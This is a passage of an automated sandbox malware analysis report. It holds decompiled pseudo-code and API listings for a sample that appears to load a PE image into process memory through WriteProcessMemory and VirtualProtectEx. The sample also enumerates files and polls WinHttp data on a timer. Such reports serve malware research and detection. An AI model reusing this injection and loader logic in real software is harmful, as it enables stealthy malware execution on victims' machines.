    						 *(_t333 - 0x24) = E0039DF30(_t331,  *((intOrPtr*)(_t319 + 0x20)));
    						 *((intOrPtr*)(_t333 - 0x2c)) = E0039DF30(_t331,  *((intOrPtr*)(_t319 + 0x24)));
    						__eflags =  *(_t319 + 0x14);
    						 *(_t333 - 0x10) =  *((intOrPtr*)( *((intOrPtr*)(_t333 - 4)) + 0x7c)) + _t241;
    						 *(_t333 - 0xc) = 0;
    						if( *(_t319 + 0x14) <= 0) {
    							L61:
    							__eflags =  *(_t331 + 0x98);
    							if( *(_t331 + 0x98) == 0) {
    								goto L78;
    							}
    							__eflags =  *(_t331 + 0x9c);
    							if( *(_t331 + 0x9c) == 0) {
    								goto L78;
    							}
    							__eflags =  *(_t331 + 0xa0);
    							if( *(_t331 + 0xa0) == 0) {
    								goto L78;
    							}
    							__eflags =  *(_t331 + 0xa4);
    							if( *(_t331 + 0xa4) == 0) {
    								goto L78;
    							}
    							_t169 =  *((intOrPtr*)(_t333 - 4));
    							_t242 = 0;
    							__eflags = 0 -  *((intOrPtr*)(_t169 + 6));
    							if(0 >=  *((intOrPtr*)(_t169 + 6))) {
    								L76:
    								 *((intOrPtr*)(_t331 + 0x58)) =  *((intOrPtr*)(_t333 - 8));
    								_t171 = E0039E6F0(_t331,  *((intOrPtr*)(_t333 - 8)), 1, 0); // executed
    								__eflags = _t171;
    								if(_t171 != 0) {
    									 *(_t331 + 0x70) = 1;
    								}
    								goto L78;
    							}
    							_t321 =  *((intOrPtr*)(_t333 - 0x30)) + 0x24;
    							__eflags = _t321;
    							while(1) {
    								_t172 =  *_t321;
    								__eflags = _t172 & 0x20000000;
    								if((_t172 & 0x20000000) == 0) {
    									__eflags = _t172 & 0x40000000;
    									if((_t172 & 0x40000000) == 0) {
    										asm("sbb eax, eax");
    										_t176 = ( ~(_t172 & 0x80000000) & 0x00000007) + 1;
    										__eflags = ( ~(_t172 & 0x80000000) & 0x00000007) + 1;
    									} else {
    										asm("sbb eax, eax");
    										_t176 = ( ~(_t172 & 0x80000000) & 0x00000002) + 2;
    									}
    								} else {
    									__eflags = _t172 & 0x40000000;
    									if((_t172 & 0x40000000) == 0) {
    										asm("sbb eax, eax");
    										_t176 = ( ~(_t172 & 0x80000000) & 0x00000070) + 0x10;
    									} else {
    										asm("sbb eax, eax");
    										_t176 = ( ~(_t172 & 0x80000000) & 0x00000020) + 0x20;
    									}
    								}
    								_t134 = _t321 - 0x1c; // 0xec81ec8b
    								_t135 = _t321 - 0x18; // 0x588
    								_t178 = E0039D9D0(_t331,  *((intOrPtr*)(_t333 + 8)),  *_t135 +  *((intOrPtr*)(_t333 - 8)),  *_t134, _t176); // executed
    								__eflags = _t178;
    								if(_t178 == 0) {
    									goto L78;
    								}
    								_t264 =  *((intOrPtr*)(_t333 - 4));
    								_t242 = _t242 + 1;
    								_t321 = _t321 + 0x28;
    								__eflags = _t242 - ( *(_t264 + 6) & 0x0000ffff);
    								if(_t242 < ( *(_t264 + 6) & 0x0000ffff)) {
    									continue;
    								}
    								goto L76;
    							}
    							goto L78;
    						} else {
    							goto L44;
    						}
    						do {
    							L44:
    							_t188 =  *(_t333 - 0x14);
    							_t243 =  *_t188;
    							 *(_t333 - 0x14) =  &(_t188[1]);
    							__eflags = _t243;
    							if(_t243 == 0) {
    								goto L60;
    							}
    							__eflags = _t243 -  *((intOrPtr*)(_t333 - 0x1c));
    							if(_t243 <  *((intOrPtr*)(_t333 - 0x1c))) {
    								L47:
    								_t267 =  *( *(_t333 - 0x18) + 0x18);
    								_t192 = 0;
    								__eflags = _t267;
    								if(_t267 == 0) {
    									goto L60;
    								}
    								_t305 =  *(_t333 - 0xc);
    								while(1) {
    									_t322 =  *((intOrPtr*)(_t333 - 0x2c));
    									__eflags = ( *(_t322 + _t192 * 2) & 0x0000ffff) - _t305;
    									if(( *(_t322 + _t192 * 2) & 0x0000ffff) == _t305) {
    										break;
    									}
    									_t192 = _t192 + 1;
    									__eflags = _t192 - _t267;
    									if(_t192 < _t267) {
    										continue;
    									}
    									goto L60;
    								}
    								_t324 = E0039DF30(_t331,  *((intOrPtr*)( *(_t333 - 0x24) + _t192 * 4)));
    								E00396CB0(_t333 - 0x94, 0x8b);
    								_t196 =  *0x3b8628; // 0x593938
    								_t335 = _t335 + 8;
    								_t197 =  *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x4c))))(_t324, _t333 - 0x94);
    								__eflags = _t197;
    								if(_t197 != 0) {
    									E00396CB0(_t333 - 0x94, 0x8c);
    									_t308 =  *0x3b8628; // 0x593938
    									_t335 = _t335 + 8;
    									_t201 =  *((intOrPtr*)( *((intOrPtr*)(_t308 + 0x4c))))(_t324, _t333 - 0x94);
    									__eflags = _t201;
    									if(_t201 != 0) {
    										E00396CB0(_t333 - 0x94, 0x8d);
    										_t272 =  *0x3b8628; // 0x593938
    										_t335 = _t335 + 8;
    										_t204 =  *((intOrPtr*)( *((intOrPtr*)(_t272 + 0x4c))))(_t324, _t333 - 0x94);
    										__eflags = _t204;
    										if(_t204 != 0) {
    											E00396CB0(_t333 - 0x94, 0x8e);
    											_t206 =  *0x3b8628; // 0x593938
    											_t335 = _t335 + 8;
    											_t207 =  *((intOrPtr*)( *((intOrPtr*)(_t206 + 0x4c))))(_t324, _t333 - 0x94);
    											__eflags = _t207;
    											if(_t207 == 0) {
    												_t244 = _t243 +  *((intOrPtr*)(_t333 - 8));
    												__eflags = _t244;
    												 *(_t331 + 0xa4) = _t244;
    											}
    										} else {
    											 *(_t331 + 0xa0) = _t243 +  *((intOrPtr*)(_t333 - 8));
    										}
    									} else {
    										 *(_t331 + 0x9c) = _t243 +  *((intOrPtr*)(_t333 - 8));
    									}
    								} else {
    									 *(_t331 + 0x98) = _t243 +  *((intOrPtr*)(_t333 - 8));
    								}
    								goto L60;
    							}
    							__eflags = _t243 -  *(_t333 - 0x10);
    							if(_t243 <  *(_t333 - 0x10)) {
    								goto L60;
    							}
    							goto L47;
    							L60:
    							_t265 =  *(_t333 - 0x18);
    							_t191 =  *(_t333 - 0xc) + 1;
    							 *(_t333 - 0xc) = _t191;
    							__eflags = _t191 -  *((intOrPtr*)(_t265 + 0x14));
    						} while (_t191 <  *((intOrPtr*)(_t265 + 0x14)));
    						goto L61;
    					}
    					while( *_t318 != 0 ||  *((intOrPtr*)(_t318 + 0x10)) != 0 ||  *((intOrPtr*)(_t318 + 8)) != 0 ||  *((intOrPtr*)(_t318 + 0xc)) != 0 ||  *((intOrPtr*)(_t318 + 4)) != 0) {
    						_t208 =  *((intOrPtr*)(_t318 + 0xc));
    						 *(_t333 - 0xc) = 0;
    						_t359 = _t208;
    						if(_t208 == 0) {
    							continue;
    						}
    						_t210 = E003917D0(_t239, _t331, _t318, _t331, _t359, E0039DF30(_t331, _t208)); // executed
    						 *(_t333 - 0x18) = _t210;
    						if(_t210 == 0) {
    							goto L78;
    						}
    						_t325 =  *((intOrPtr*)(_t333 - 0x1c));
    						_t211 =  *_t325;
    						if( *_t325 == 0) {
    							_t211 =  *((intOrPtr*)(_t325 + 0x10));
    						}
    						_t212 = E0039DF30(_t331, _t211);
    						_t239 =  *((intOrPtr*)(_t325 + 0x10)) +  *((intOrPtr*)(_t333 - 8));
    						 *(_t333 - 0x14) = _t212;
    						_t213 =  *_t212;
    						if(_t213 == 0) {
    							L41:
    							_t318 = _t325 + 0x14;
    							 *((intOrPtr*)(_t333 - 0x1c)) = _t318;
    							continue;
    						} else {
    							_t326 =  *(_t333 - 0x18);
    							while(1) {
    								_t278 = _t331;
    								_t363 = _t213;
    								if(_t213 >= 0) {
    									_t214 = E0039DF30(_t278, _t213);
    									_t215 = _t214 + 2;
    									__eflags = _t214 + 2;
    									_t278 = _t331;
    								} else {
    									_t215 = _t213 & 0x0000ffff;
    								}
    								_t216 = E003965F0(_t278, _t331, _t363, _t326, _t215); // executed
    								 *(_t333 - 0xc) = _t216;
    								if(_t216 == 0) {
    									goto L78;
    								}
    								_t63 = _t331 + 0x5c; // 0x8b000000
    								_t218 = E00397B30(_t331,  *_t63, _t239, _t333 - 0xc, 4); // executed
    								if(_t218 == 0) {
    									goto L78;
    								}
    								_t220 =  *(_t333 - 0x14) + 4;
    								 *(_t333 - 0x14) = _t220;
    								_t213 =  *_t220;
    								_t239 = _t239 + 4;
    								if(_t213 != 0) {
    									continue;
    								}
    								_t325 =  *((intOrPtr*)(_t333 - 0x1c));
    								goto L41;
    							}
    							goto L78;
    						}
    					}
    					goto L42;
    				}
    				_t239 = E0039DF30(_t331,  *((intOrPtr*)( *((intOrPtr*)(_t333 - 4)) + 0xa0)));
    				if(_t239 == 0) {
    					goto L78;
    				}
    				_t223 = 0;
    				if( *_t239 == 0) {
    					goto L21;
    				} else {
    					goto L12;
    				}
    				do {
    					L12:
    					_t284 =  *(_t239 + 4) - 8 >> 1;
    					 *(_t333 - 0x14) = _t284;
    					_t26 = _t239 + 8; // 0x8
    					 *(_t333 - 0x18) = _t223;
    					 *(_t333 - 0x28) = _t223;
    					 *(_t333 - 0x24) = _t223;
    					 *(_t333 - 0x10) = _t26;
    					if(_t284 == 0) {
    						goto L20;
    					} else {
    						goto L13;
    					}
    					do {
    						L13:
    						_t224 =  *( *(_t333 - 0x10)) & 0x0000ffff;
    						_t287 = _t224 >> 0xc;
    						if(_t287 != 3) {
    							__eflags = _t287 - 0xa;
    							if(_t287 != 0xa) {
    								goto L18;
    							} else {
    								_t329 = (_t224 & 0x00000fff) +  *_t239;
    								_t227 = E0039DF30(_t331, _t329);
    								_push(8);
    								asm("adc edx, [eax+0x4]");
    								_t330 = _t329 +  *((intOrPtr*)(_t333 - 8));
    								__eflags = _t330;
    								_push(_t333 - 0x28);
    								 *(_t333 - 0x24) = 0;
    								_push(_t330);
    								 *(_t333 - 0x28) =  *(_t333 - 0xc) +  *_t227;
    								_push( *((intOrPtr*)(_t333 + 8)));
    								goto L17;
    							}
    						} else {
    							_t327 = (_t224 & 0x00000fff) +  *_t239;
    							_t232 = E0039DF30(_t331, _t327);
    							_push(4);
    							_push(_t333 - 0x18);
    							 *(_t333 - 0x18) =  *_t232 +  *(_t333 - 0xc);
    							_push(_t327 +  *((intOrPtr*)(_t333 - 8)));
    							_push( *((intOrPtr*)(_t333 + 8)));
    							L17:
    							if(E00397B30(_t331) == 0) {
    								goto L78;
    							}
    						}
    						L18:
    						 *(_t333 - 0x10) =  &(( *(_t333 - 0x10))[1]);
    						_t45 = _t333 - 0x14;
    						 *_t45 =  *(_t333 - 0x14) - 1;
    					} while ( *_t45 != 0);
    					_t223 = 0;
    					L20:
    					_t239 = _t239 +  *(_t239 + 4);
    				} while ( *_t239 != _t223);
    				goto L21;
    			}

    APIs
      • Part of subcall function 0039D9D0: VirtualProtectEx.KERNELBASE(0039FEDD,00000040,00002000,?,0039FE81,0039FE81,?,0039B4CC,0039C9A1,00000000,?,00000002,0039C9A1,00000000,C45D89F0,?), ref: 0039D9F8
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
      • Part of subcall function 003917D0: GetProcAddress.KERNEL32(00000000,?,?,0039FE81,?), ref: 0039181C
      • Part of subcall function 003965F0: GetProcAddress.KERNEL32(00000000,?,?,00000000,0039C9A1), ref: 0039663A
    • memset.MSVCRT ref: 0039B546
      • Part of subcall function 00397B30: WriteProcessMemory.KERNELBASE(00000000,00000070,?,?,00000000,00000000,00000000,?,0039CCFB,?,?,?,00000070,?,?,?), ref: 00397B5C
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 96%
    			E0039AC90(intOrPtr _a4, intOrPtr _a8) {
    				void* _v8;
    				void* _v12;
    				void* _v16;
    				char _v216;
    				void* __ebx;
    				intOrPtr* _t41;
    				short _t42;
    				short _t47;
    				short _t49;
    				short* _t51;
    				short _t58;
    				short _t60;
    				intOrPtr _t64;
    				intOrPtr _t66;
    				char _t67;
    				short* _t71;
    				short _t75;
    				void* _t86;
    				intOrPtr _t89;
    				void* _t92;
    				void* _t97;
    
    				_t86 = 0;
    				_t63 = _a4 + 0x2c;
    				_v8 = 0;
    				_v16 = 0;
    				_v12 = 0;
    				if(E0039DA00(_a4 + 0x2c) == 0) {
    					L28:
    					_t64 = 1;
    				} else {
    					do {
    						_t67 = _v8;
    						if(_t67 != 0) {
    							E00399FC0(_t67);
    							_push(_t67);
    							L00391CB0();
    							_t97 = _t97 + 4;
    						}
    						_v8 = 0;
    						if(E00392640(_t63, _v12,  &_v8) == 0) {
    							goto L27;
    						} else {
    							_t41 = _v8;
    							if( *((intOrPtr*)(_t41 + 8)) != 0) {
    								goto L27;
    							} else {
    								_t71 =  *_t41;
    								if(_t71 == 0) {
    									goto L27;
    								} else {
    									_t42 = 0x7fffffff;
    									while( *_t71 != 0) {
    										_t71 = _t71 + 2;
    										_t42 = _t42 - 1;
    										if(_t42 != 0) {
    											continue;
    										} else {
    											goto L27;
    										}
    										goto L30;
    									}
    									__eflags = _t42;
    									if(_t42 == 0) {
    										goto L27;
    									} else {
    										_t92 = 0x7fffffff - _t42 + 6;
    										_t12 = _t92 + 2; // 0x7ffffffb
    										_t86 = E003A1D90(0x7fffffff + _t12, _t86);
    										_t97 = _t97 + 8;
    										__eflags = _t86;
    										if(__eflags == 0) {
    											goto L27;
    										} else {
    											E00399090(__eflags,  &_v216, 0x14);
    											_t16 = _t92 + 1; // 0x7ffffffa
    											_t47 = E003A0C10(_t86, _t16,  &_v216,  *_v8);
    											_t97 = _t97 + 0x18;
    											__eflags = _t47;
    											if(__eflags < 0) {
    												goto L27;
    											} else {
    												__eflags = E00396110(_a8, __eflags, 0x3e, _t86);
    												if(__eflags == 0) {
    													goto L27;
    												} else {
    													_t49 = E00397560(_t63, __eflags, _a8); // executed
    													_t97 = _t97 + 4;
    													__eflags = _t49;
    													if(_t49 == 0) {
    														L29:
    														_t64 = _v16;
    													} else {
    														_t51 =  *((intOrPtr*)(_v8 + 4));
    														__eflags = _t51;
    														if(_t51 == 0) {
    															goto L27;
    														} else {
    															_t75 = 0x7fffffff;
    															while(1) {
    																__eflags =  *_t51;
    																if( *_t51 == 0) {
    																	break;
    																}
    																_t51 = _t51 + 2;
    																_t75 = _t75 - 1;
    																__eflags = _t75;
    																if(_t75 != 0) {
    																	continue;
    																} else {
    																	goto L27;
    																}
    																goto L30;
    															}
    															__eflags = _t75;
    															if(_t75 == 0) {
    																goto L27;
    															} else {
    																_t22 = _t92 + 0x7fffffff - _t75 + 2; // 0x7ffffffb
    																_t86 = E003A1D90(_t92 + 0x7fffffff - _t75 + _t22, _t86);
    																_t97 = _t97 + 8;
    																__eflags = _t86;
    																if(__eflags == 0) {
    																	goto L27;
    																} else {
    																	E00399090(__eflags,  &_v216, 0xc);
    																	_push( *((intOrPtr*)(_v8 + 4)));
    																	_t58 = E003A0C10(_t86, _t93 + 1,  &_v216,  *_v8);
    																	_t97 = _t97 + 0x1c;
    																	__eflags = _t58;
    																	if(__eflags < 0) {
    																		goto L27;
    																	} else {
    																		_t95 = _a8;
    																		__eflags = E00396110(_a8, __eflags, 0x3e, _t86);
    																		if(__eflags == 0) {
    																			goto L27;
    																		} else {
    																			_t60 = E00397560(_t63, __eflags, _t95); // executed
    																			_t97 = _t97 + 4;
    																			__eflags = _t60;
    																			if(_t60 == 0) {
    																				goto L29;
    																			} else {
    																				E00397110(_t63, _v12, 1);
    																				goto L27;
    																			}
    																		}
    																	}
    																}
    															}
    														}
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    						goto L30;
    						L27:
    						_t89 = _v12 + 1;
    						_v12 = _t89;
    					} while (_t89 < E0039DA00(_t63));
    					goto L28;
    				}
    				L30:
    				if(_t86 != 0) {
    					E0039BB40(_t86);
    					_t97 = _t97 + 4;
    				}
    				_t66 = _v8;
    				if(_t66 != 0) {
    					E00399FC0(_t66);
    					_push(_t66);
    					L00391CB0();
    				}
    				return _t64;
    			}

    APIs
    • ??3@YAXPAX@Z.MSVCRT ref: 0039ACCF
      • Part of subcall function 00392640: ??2@YAPAXI@Z.MSVCRT ref: 0039265D
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
      • Part of subcall function 003A0C10: _vsnwprintf.MSVCRT ref: 003A0C42
      • Part of subcall function 00396110: _itow.MSVCRT ref: 0039615E
    • ??3@YAXPAX@Z.MSVCRT ref: 0039AE7A
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 00399FC0: SysFreeString.OLEAUT32(00000000), ref: 00399FD1
      • Part of subcall function 00399FC0: SysFreeString.OLEAUT32(?), ref: 00399FDB
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 93%
    			E00395700(intOrPtr __ecx, void* __eflags) {
    				signed int _v8;
    				signed int _v12;
    				char _v212;
    				void* __ebx;
    				void* __edi;
    				void* _t23;
    				signed int _t24;
    				void* _t37;
    				signed int _t45;
    				intOrPtr _t51;
    				signed int _t52;
    				void* _t53;
    				void* _t54;
    				void* _t55;
    
    				_t52 = 0;
    				_t51 = __ecx;
    				_v8 = 0;
    				E00399090(__eflags,  &_v212, 0x71);
    				_t23 = E00392450( &_v212,  &_v8); // executed
    				_t37 = _t23;
    				_t24 = _v8;
    				_t55 = _t54 + 0x10;
    				if(_t37 != 0 || _t24 == 0) {
    					_v12 = _t52;
    					if(_t24 > 0) {
    						do {
    							_push(0xa8);
    							L0039A47E();
    							_t55 = _t55 + 4;
    							if(_t24 == 0) {
    								_t53 = 0;
    								__eflags = 0;
    							} else {
    								_t53 = E0039B110(_t24);
    							}
    							 *((intOrPtr*)(_t53 + 0x44)) = _t51;
    							if(E00393630(_t53,  *((intOrPtr*)( *((intOrPtr*)(_t51 + 8)))),  *((intOrPtr*)(_t37 + _v12 * 4))) == 0 ||  *((intOrPtr*)(_t53 + 0x14)) == 0 || E0039C960(_t51, _t53) == 0 || E0039D6E0(_t51, _t53) == 0) {
    								E00397A20(_t37, _t53, _t51);
    								_push(_t53);
    								L00391CB0();
    								_t55 = _t55 + 4;
    							}
    							_t24 = _v8;
    							_t45 = _v12 + 1;
    							_v12 = _t45;
    						} while (_t45 < _t24);
    					}
    					_t52 = 1;
    					if(_t37 != 0) {
    						while(_t24 != 0) {
    							_v8 = _t24 - 1;
    							E0039BB40( *((intOrPtr*)(_t37 + (_t24 - 1) * 4)));
    							_t24 = _v8;
    							_t55 = _t55 + 4;
    						}
    						_v8 = _t24 - 1;
    						E0039BB40(_t37);
    					}
    				}
    				return _t52;
    			}

    APIs
      • Part of subcall function 00392450: FindFirstFileW.KERNELBASE(?,?,?,00000105,*.*), ref: 003924FB
      • Part of subcall function 00392450: FindNextFileW.KERNELBASE(00000000,00000010), ref: 003925D3
      • Part of subcall function 00392450: GetLastError.KERNEL32 ref: 003925DD
    • ??2@YAPAXI@Z.MSVCRT ref: 00395755
      • Part of subcall function 00393630: SysFreeString.OLEAUT32(?), ref: 00393668
      • Part of subcall function 00393630: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00393693
      • Part of subcall function 00397A20: SysFreeString.OLEAUT32(?), ref: 00397A3C
    • ??3@YAXPAX@Z.MSVCRT ref: 003957AF
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 37%
    			E003B1660(void* __ecx, intOrPtr* _a4, intOrPtr* _a8) {
    				char _v8;
    				void* _v12;
    				char _v16;
    				void* _t17;
    				char* _t20;
    				intOrPtr _t21;
    				void* _t22;
    				intOrPtr _t23;
    				void* _t25;
    				long _t32;
    				void* _t33;
    				void* _t34;
    
    				_t17 = 0;
    				_t25 = __ecx;
    				_t32 = 0;
    				_t33 = 0;
    				_v16 = 0;
    				_v12 = 0;
    				if( *((intOrPtr*)(__ecx + 0xc)) != 0) {
    					while(1) {
    						_v8 = _t17;
    						_t20 =  &_v8;
    						__imp__WinHttpQueryDataAvailable( *((intOrPtr*)(_t25 + 0xc)), _t20); // executed
    						if(_t20 == 0) {
    							goto L11;
    						}
    						_t21 = _v8;
    						if(_t21 == 0) {
    							L10:
    							_v12 = 1;
    						} else {
    							_t32 = _t32 + _t21;
    							if(_t33 == 0) {
    								_t22 = E003A1D90(_t32, 0);
    								_t34 = _t34 + 8;
    								_t33 = _t22;
    							} else {
    								_t23 = E003A1D90(_t32, _t33); // executed
    								_t33 = _t23;
    								_t34 = _t34 + 8;
    								_t22 = _t23 - _v8 + _t32;
    							}
    							__imp__WinHttpReadData( *((intOrPtr*)(_t25 + 0xc)), _t22, _v8,  &_v16);
    							if(_t22 != 0) {
    								if(_v8 > 0) {
    									_t17 = 0;
    									continue;
    								} else {
    									goto L10;
    								}
    							}
    						}
    						goto L11;
    					}
    				}
    				L11:
    				 *_a4 = _t33;
    				 *_a8 = _t32;
    				return _v12;
    			}

    APIs
    • WinHttpQueryDataAvailable.WINHTTP(?,?,00000000,00000000,00000001,?,?,?,?,00000000), ref: 003B168D
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • WinHttpReadData.WINHTTP(?,00000000,?,?), ref: 003B16D1
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 37%
    			E0039D750(intOrPtr* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
    				char _v8;
    				char _v12;
    				intOrPtr _t18;
    				intOrPtr* _t19;
    				void* _t21;
    				char _t24;
    				intOrPtr _t33;
    				intOrPtr* _t35;
    
    				_t24 = 0;
    				_t35 = __ecx;
    				_v8 = 0;
    				_v12 = 0;
    				if( *((intOrPtr*)(__ecx + 4)) != 0) {
    					if(E00391170(_a4, 0xfde9,  &_v8, _a8) != 0) {
    						_t18 = _v8;
    						__imp__#2(_t18, __edi);
    						_t33 = _t18;
    						if(_t33 != 0) {
    							_t19 =  *((intOrPtr*)(_t35 + 4));
    							_t21 =  *((intOrPtr*)( *((intOrPtr*)( *_t19 + 0x104))))(_t19, _t33,  &_v12); // executed
    							if(_t21 >= 0 && _v12 != 0) {
    								_t24 =  *((intOrPtr*)( *((intOrPtr*)( *_t35))))();
    							}
    							__imp__#6(_t33);
    						}
    					}
    					_t16 = _v8;
    					if(_v8 != 0) {
    						E0039BB40(_t16);
    					}
    				}
    				return _t24;
    			}

    APIs
    • SysAllocString.OLEAUT32(00000000), ref: 0039D789
    • SysFreeString.OLEAUT32(00000000), ref: 0039D7BD
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 46%
    			E0039CE00(void* __ecx, char __edx) {
    				char _v8;
    				void* _t10;
    				void* _t11;
    				void* _t13;
    				intOrPtr _t17;
    				char _t21;
    				intOrPtr* _t23;
    				void* _t24;
    				void* _t25;
    				void* _t26;
    				void* _t27;
    				void* _t30;
    
    				_t21 = __edx;
    				_t23 = __imp___time64;
    				_t24 = __ecx;
    				_t10 =  *_t23(0);
    				_t26 = _t25 + 4;
    				_t11 = _t10 -  *0x3b85b0;
    				_t30 = _t11;
    				asm("sbb edx, [0x3b85b4]");
    				_v8 = __edx;
    				if(_t30 < 0) {
    					L10:
    					return _t11;
    				} else {
    					if(_t30 > 0) {
    						L3:
    						_t13 = E003B1E30(_t31,  &_v8); // executed
    						_t27 = _t26 + 4;
    						if(_t13 == 0) {
    							__eflags =  *((intOrPtr*)(_t24 + 0x2c));
    							if( *((intOrPtr*)(_t24 + 0x2c)) != 0) {
    								return E0039BB40(_v8);
    							}
    							 *((intOrPtr*)(_t24 + 0x2c)) = _v8;
    							return _t13;
    						} else {
    							_t16 =  *((intOrPtr*)(_t24 + 0x2c));
    							if( *((intOrPtr*)(_t24 + 0x2c)) != 0) {
    								E0039BB40(_t16);
    								_t27 = _t27 + 4;
    							}
    							 *((intOrPtr*)(_t24 + 0x2c)) = _v8;
    							_t17 =  *_t23(0);
    							 *0x3b85b0 = _t17;
    							 *0x3b85b4 = _t21;
    							return _t17;
    						}
    					} else {
    						_t31 = _t11 - 0x7080;
    						if(_t11 <= 0x7080) {
    							goto L10;
    						} else {
    							goto L3;
    						}
    					}
    				}
    			}

    APIs
    • _time64.MSVCRT ref: 0039CE12
    • _time64.MSVCRT ref: 0039CE59
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    APIs
    • WinHttpCloseHandle.WINHTTP(?,00000000,00000000,00000001,?,003B1EB0,?,00000000), ref: 003B1330
    • WinHttpConnect.WINHTTP(?,?,003B1EB0,00000000,?,003B1EB0,?,00000000), ref: 003B135F
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
